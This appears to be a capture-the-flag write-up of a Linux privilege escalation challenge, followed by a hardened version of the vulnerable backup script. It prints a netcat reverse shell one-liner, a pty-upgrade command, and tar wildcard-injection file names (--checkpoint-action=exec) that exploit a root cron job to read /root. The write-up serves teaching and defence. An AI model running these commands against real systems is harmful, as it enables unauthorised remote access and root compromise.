CTF Web Security

ACTF up up (Privilege Escalation)

Posted on 2020-06-09, 3 min read

Downloading www.zip reveals a one-line webshell backdoor.
Connect to it.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP port >/tmp/f

This spawns a reverse shell.
Reading flag_here in the root directory gives:

flag in /root/
actf:actf2020

The second line looks like a user's account name and password.
Try switching to that user with su:

$ su actf
su: must be run from a terminal

Run python -c 'import pty;pty.spawn("/bin/bash")' to get a proper terminal,
then su to the actf user.
Checking the scheduled tasks gives:

# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/1 * * * * root /etc/cron.daily/backup

Look at /etc/cron.daily/backup:

#!/bin/sh
for i in $(ls /home); do cd /home/$i && /bin/tar -zcf /etc/backups/home-$i.tgz *; done

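The script loops over /home and, for each directory there, archives its contents to /etc/backups/home-$i.tgz.
The job runs as root every minute, and because it passes an unquoted * to tar from inside each home directory, any file name there that begins with -- is parsed by tar as an option.
Searching for tar privilege escalation turns up:
https://www.cnblogs.com/linuxsec/articles/10701392.html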

echo 'cat /root/* > /tmp/flag' > shell.sh;chmod +x shell.sh
echo > "--checkpoint-action=exec=sh shell.sh"
echo > "--checkpoint=1"

Then just read the flag from /tmp.
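
A hardened form of the backup job above, together with a helper that flags option-like file names, as an added example that is not part of the original write-up. The function names and the source/destination arguments are assumptions; the original job used /home and /etc/backups.

```shell
#!/bin/sh
# Added example: hardened backup job plus an audit helper.
# Usage (hypothetical): backup_homes /home /etc/backups

# Print entries whose names start with "-" directly inside each subdirectory
# of $1. Such names turn into command-line options when a script expands a
# bare "*" in that directory, which is what the original cron job did.
find_option_like_names() {
    find "$1" -mindepth 2 -maxdepth 2 -name '-*' -print
}

# Back up every directory under $1 into $2 without letting file names reach
# tar's option parser.
backup_homes() {
    src=$1
    dest=$2
    for dir in "$src"/*/; do            # glob instead of parsing ls output
        [ -d "$dir" ] || continue
        name=$(basename "$dir")
        # -C makes tar change directory itself and "." is the only member
        # argument, so individual file names never appear on the command
        # line. Where a glob is unavoidable, "./*" has the same effect,
        # because every expanded name then starts with "./" and not "-".
        tar -zcf "$dest/home-$name.tgz" -C "$dir" . || return 1
    done
}
```

Running find_option_like_names against /home before and after deploying the fix shows whether any user has already planted such names.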
